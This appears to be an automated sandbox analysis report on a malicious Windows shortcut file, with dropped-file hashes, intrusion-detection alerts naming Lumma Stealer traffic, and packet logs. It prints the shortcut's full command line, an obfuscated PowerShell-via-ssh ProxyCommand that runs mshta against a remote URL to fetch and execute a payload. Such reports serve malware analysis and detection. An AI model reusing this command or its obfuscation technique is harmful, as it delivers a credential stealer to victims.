SSDEEP:	1536:M5UxHYifOxFNJqfehRMU8pd05ra6F0BMAFjWAYI6Y:M5UGdbqZU8n05ra6F0CAx9+Y
MD5:	2CFD046E54879EDD793EC9DAC49E9DBB
SHA1:	ADACE24A1F82BFB32B1C9791044A6E031A97274D
SHA-256:	0FA9C63BC38F701A1A02174CF6C4873CA2C0D5B6CC25EE26003894CB347E7B46
SHA-512:	2097CB5049673097E48C8B53F21FF3920FA34177C017CBDD3A3C3E4BCB5F14E609D80A426D5F93B03ED429BA9CD911E63B954B7D5E386E0A68BB7D5A3FDA87F8
Malicious:	false
Preview:	<.J.O...s+.c<u.N...\..QZQ75Tw\|+...(2.....&...E.a5E.j.9.>.2r...B.....3...UE.$_"1.4....9U.8.:......J.o.\|.T.K.k>\|.a ..Q..f.+!....Z...C....j=...)41...A.^...^...2=?.[_.....,~){...{.k;E....=<.G\|...2...rD..k....".K1.....r...K...4..~..;...;.dAC.4(~....2l]..T.d.z..{.C..0...y.8X.).-...K{...vF8D. ...D.w.hc\Y.-..[y..u.nE.f.......{.!..m..?......wKP...>..h.!...y.0..8D..{4.m,.Qo>m.A.J...v.fI~..T-$..K..G..Y.B.@..>$8y,..........S..3...<..Jx./I..s..o.DWh..........q..X..r..".8pvA....M..lf....MA.b )W.P....@/.c..7;@MCI..qT.'..+.s..8.r.....z..D...y.X..!..H.o?4.t8V.~.3q.Ft+../....`..m.n%M..b....;a....n..a..]..U..Z..QeM.o/lt.....E..q.OV.o.g..Q/(........$..u.P%T..N......E!U.qat..Z..K.!..{#8........dfT..9M......@K1.....K^.0......,.S.(.....&m..DG.[WA..7...$...7.`.~.e..P..nh....e...Z.6......IB.Wh...-.../..!..v..>$.T..v....T..d.~E..u....O.y...f4.9A.d.t...+H/..$A..I...j.N.....J_...t.......f#...J...2O...1.1.?fWI./...2OLJ.._3...!=.W-..e..)..+(....}<T..w..R.Q".....4.x....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkwjqpqb.1mx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nv3deh0o.lvb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3kczv0p.0qo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4oze4ue.a32.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sv21bfk3.qth.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yomeakql.jdd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\IntroductoryTunes.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1007262
Entropy (8bit):	7.980991916319088
Encrypted:	false
SSDEEP:	12288:X0gtQOUpkmga4wdlem5NEnWPA4SIV1rPI9g8mEUGq2wDSkWu2g3c6Y6A63f2:kqvokBLuNXtSSaCb2weR6Y6dv2
MD5:	12B325F869EA3948FD7ADDBCD59AAC1C
SHA1:	272F860435F504309123FB64B9808B7500872597
SHA-256:	0EFD1E3855AD282212796B68247645764E541C7BD7879345428914D34DA4567E
SHA-512:	6FB911B9F72E77117CFB4CABF4CAD0AE3B74B1D3E846B6D1C5C7F26C12D48F9E75C818D64FF8279DDEF8FFC3082083ACC5573D0634D9D448D133D7AB2634DF56
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................@......\|.....@.................................@............,...............R...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc....,..........................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Archive, ctime=Tue Mar 12 19:03:11 2024, mtime=Mon Jun 17 15:01:49 2024, atime=Tue Mar 12 19:03:11 2024, length=450560, window=hidenormalshowminimized
Entropy (8bit):	3.1635849415193253
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	JSWunwO4rS.lnk
File size:	2'476 bytes
MD5:	624101f6b4285e2425c8851c2350d787
SHA1:	bd1c79428041143f49cb695cd947f4448540d5c9
SHA256:	cb99077ec6936521cec13989456a3d87a275fb2a3508f67b624805bba5d26ef3
SHA512:	e2c71455694b563f1b5caab453786d725644c5c07831619fac4d0f8dd50834e9c19464b7e9429a5d52d62514f9c20b93f7ee74cbfc0867056039ea876f217a54
SSDEEP:	48:8FLZrCiCGXaUk8oizVwu9+dJ9bBpBd5W:8FFrDtqUHx9Knvd
TLSH:	8C5157142AE5072CF2739B319476A234F53B7C45DDA0CB5E0183828C2872A55E5B5F6B
File Content Preview:	L..................F.@.. ......O.t...6a........O.t...............................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

File Icon


Icon Hash:	72d282828e8d8dd5

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Command Line Argument:	-o ProxyCommand="powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')" .
Icon location:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-06T15:27:09.920489+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49875	104.21.10.2	443	TCP
2024-12-06T15:27:12.503814+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49875	104.21.10.2	443	TCP
2024-12-06T15:27:12.503814+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49875	104.21.10.2	443	TCP
2024-12-06T15:27:13.765494+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49884	104.21.10.2	443	TCP
2024-12-06T15:27:19.159696+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49884	104.21.10.2	443	TCP
2024-12-06T15:27:19.159696+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49884	104.21.10.2	443	TCP
2024-12-06T15:27:20.592956+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49902	104.21.10.2	443	TCP
2024-12-06T15:27:26.431331+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49915	104.21.10.2	443	TCP
2024-12-06T15:27:30.715791+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49926	104.21.10.2	443	TCP
2024-12-06T15:27:34.898544+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49937	104.21.10.2	443	TCP
2024-12-06T15:27:37.949822+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49937	104.21.10.2	443	TCP
2024-12-06T15:27:39.495203+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49948	104.21.10.2	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 15:25:40.670104027 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:40.670175076 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:40.670253992 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:40.716577053 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:40.716612101 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:41.939297915 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:41.939378977 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:41.989471912 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:41.989523888 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:41.989906073 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:41.989959002 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:41.992136955 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.039336920 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.741457939 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.741543055 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.741611004 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.741691113 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.742090940 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.742142916 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.743077040 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.743134022 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.743144035 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.743155003 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.743186951 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.743230104 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.748030901 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.748089075 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.756588936 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.756654978 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.756813049 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.756879091 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.764966011 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.765033960 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.861439943 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.861500978 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.861530066 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.861576080 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.865602970 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.865653992 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.933229923 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.933307886 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.937087059 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.937143087 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.938662052 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.938714027 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.946528912 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.946582079 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.946662903 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.946706057 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.954595089 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.954647064 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.954874039 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.954909086 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.962719917 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.962764978 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.962809086 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.962852955 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.970278978 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.970325947 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.978216887 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.978272915 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.978420973 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.978460073 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.978473902 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.978514910 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.986042023 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.986098051 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.986203909 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.986238956 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.994071960 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.994121075 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:42.994127989 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:42.994164944 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.002110004 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.002162933 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.008147955 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.008193970 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.008338928 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.008387089 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.014359951 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.014441013 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.014615059 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.014662981 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.020565033 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.020627975 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.020673037 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.020716906 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.026772022 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.026813984 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.125466108 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.125518084 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.127515078 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.127566099 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.127688885 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.127753973 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.132113934 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.132157087 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.138622999 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.138686895 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.147345066 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.147407055 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.151504040 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.151565075 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.155689001 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.155754089 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.163847923 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.163906097 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.171096087 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.171156883 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.179224968 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.179277897 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.183123112 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.183187962 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.190969944 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.191026926 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.198390007 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.198450089 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.202461004 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.202510118 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.210128069 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.210186958 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.217818975 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.217890024 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.222503901 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.222563028 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.318039894 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.318109035 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.322746992 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.322801113 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.326915979 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.326965094 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.332937002 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.332987070 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.336014032 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.336066961 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.342097998 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.342148066 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.344757080 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.344801903 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.349870920 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.349915028 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.354810953 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.354873896 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.360104084 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.360151052 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.362910032 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.362956047 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.368221045 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.368264914 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.370809078 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.370856047 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.376087904 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.376132965 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.381340027 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.381511927 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.386574030 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.386626005 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.389441013 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.389489889 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.394598961 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.394665003 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.399815083 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.399879932 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.404875040 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.404936075 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.407541990 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.407608986 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.407726049 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.407763004 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.412708044 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.412789106 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.417908907 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.417984962 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.438306093 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.438405037 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.442234039 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.442301035 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.515378952 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.515396118 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.515446901 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.515522003 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.515541077 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.515572071 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.515589952 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.530184031 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.530216932 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.530301094 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.530311108 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.530349970 CET	49704	443	192.168.2.5	172.67.219.101
